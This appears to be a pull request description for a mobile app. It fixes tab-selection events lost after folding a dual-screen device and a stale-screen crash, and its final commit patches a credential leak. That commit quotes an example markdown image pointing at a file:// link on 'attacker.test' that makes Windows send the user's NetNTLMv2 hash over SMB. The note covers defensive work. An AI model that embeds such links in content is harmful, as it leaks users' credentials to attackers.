After a pose change, a Screens mount transaction could clear the pending user-selection flag before UIKit delivered the selection event. Vendor Screens t3.31 with upstream fixes #4862 and #4890. Extend Reanimated screen recognition to v5 containers so returning to a cleared tab does not delay removing its old detail and crash.

Verified on a clean Duo native client: first tap in both directions after folding, details in both tabs, next-row navigation, cancelled back swipe, and Back to list. Native event logs confirmed JS received the first selection. Mobile typecheck and focused tests passed.

The vendored tarball's source is published as t3-v5.0.0-t3.31 and lands on the fork with pingdotgg/react-native-screens#3. This layer contains no search-observer swizzle; that is #23146.

Implemented with Claude Opus 5.5 in Claude Code; integrated and reviewed with GPT-6.1 in Codex.

Motion verification

Fresh, real-time 30 fps recordings from the exact commits labeled in the videos, using fingerprint-matched debug native clients. Black cards mark cuts between displays.

Before

Before — PR 22979

After

After — PR 22979

These recordings demonstrate stale detail removal and the second-tap crash fix. They do not reproduce the approximately 150 ms first-tap race: automated taps landed 1–6 seconds after unfolding, so this video is not proof of that timing fix.

Unfold-after-sheets assertion

Unfolding after using folded sheets hit a React Native touch-handler double-detach assertion in one of two runs at both ee9cd8c1b4a and fe16f614bef. Screens t3.35 in #23149 fixes it: the touch handler is attached and detached only when that changes something.

Unfold-after-sheets assertion, before t3.35

Restack

Restacked onto main a12d6ed942 on 2026-10-21. The commits are unchanged apart from lockfile peer strings. The recordings above show the pre-restack commits they name.

Approvability

Verdict: Approved at e5cb117

Macroscope's review found this PR approvable — This is a focused mobile navigation bug fix that updates the vendored Screens fork and applies a small Reanimated compatibility patch for existing v5 stack, split, and tab containers. The runtime impact is limited to correcting tab-event delivery and screen-removal timing on existing navigation paths; no product defaults or static-analysis suppressions are changed.

No code changes detected at 3f0e621. Prior analysis still applies.

After a fold or unfold, UIKit delivers didSelectTab: about 150 ms after
shouldSelectTab:. The layout commits from the pose change land in that
window, and every Screens container update cleared the flag that marked
the selection as the user's. Screens then dropped it as programmatic, so
the native tab changed but onTabSelected never fired and the app kept
the old tab's state until a second tap.

Screens 5.0.0-t3.31 takes upstream's fix (software-mansion/react-native-screens#4862
and #4890): the tab controller marks its own selectedTab writes, which
UIKit reports synchronously, and treats every other didSelectTab: as a
user selection. The release also carries the opt-in horizontal sheet
bars from pingdotgg/react-native-screens#2, unused until the sheets
change adopts them.

…hing

A tab switch pops the workspace to its list, so the tab you return to
drops the detail it was showing. Its column attaches the empty
placeholder and removes the old screen in one commit, but Reanimated
held the removal for exiting animations inside the screen, because it
only exempts legacy Screens components. Screens pushed the placeholder
over the still-mounted pull request, then popped a screen that was no
longer on top: debug builds crashed with "Attempt to pop non-top
screen", and release builds would pop the placeholder and leave the
stale pull request showing. This affects iPad and iPhone Duo columns,
folded or not.

Reanimated now treats Screens v5 stack, split and tab screens like
legacy screens, so their removal lands in the same mount as the rest of
the commit.

* Merge commit from fork

A markdown image such as ![x](file://attacker.test/share/cat.jpg), or a raw
\\host\share path, was classified as a host file. Rendering it asked the
server for a signed asset URL, and the server's realpath on the resulting UNC
path made Windows open an SMB session and send the user's NetNTLMv2 response
to the attacker's host, with no click and no tool call. File-link chips did
the same through filesystem.getMetadata, which stats every absolute path, and
storage cleanup stats the store paths in a worktree's pnpm manifest, which an
agent can write.

Network paths (two leading separators, as Windows reads them: \\h, //h, /\h)
now only resolve inside the thread's project, so projects on a share keep
working:

- clients block them in markdown images and stop treating them as file links
- the web stops asking for their metadata
- the server refuses them for media assets and file reads outside the
project, never stats one for metadata, and storage cleanup ignores a pnpm
  manifest that names one
- each check hands the filesystem the resolved path it approved, since
Windows reads a `\\?\` path as written, `..` included
